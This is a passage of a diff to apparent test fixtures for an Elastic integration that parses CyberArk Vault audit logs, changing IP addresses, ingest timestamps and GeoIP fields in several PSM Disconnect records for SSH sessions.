Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -538,21 +502,21 @@ "psmid": "PSMServer", "session_id": "d8ff4d32-8292-11eb-b962-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:12" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 09:55:02", "desc": "PSM Disconnect" 
@@ -564,8 +528,8 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-06-09T10:24:31.624804300Z", - "original": "\u003c5\u003e1 2021-03-11T17:55:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:55:02\",\"IsoTimestamp\":\"2021-03-11T17:55:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813790600Z", + "original": "\u003c5\u003e1 2021-03-11T17:55:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:55:02\",\"IsoTimestamp\":\"2021-03-11T17:55:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -588,20 +552,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -625,7 +580,7 @@ }, "@timestamp": "2021-03-11T17:56:42.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -637,15 +592,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:56:42Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -658,21 +613,21 @@ "psmid": "PSMServer", "session_id": "173dd46a-8293-11eb-afcb-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:12" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 09:56:42", "desc": "PSM Disconnect" 
@@ -684,8 +639,8 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-06-09T10:24:31.624807Z", - "original": "\u003c5\u003e1 2021-03-11T17:56:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:42\",\"IsoTimestamp\":\"2021-03-11T17:56:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813796Z", + "original": "\u003c5\u003e1 2021-03-11T17:56:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:56:42\",\"IsoTimestamp\":\"2021-03-11T17:56:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -708,20 +663,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -745,7 +691,7 @@ }, "@timestamp": "2021-03-11T20:23:30.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -757,15 +703,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T20:23:30Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n 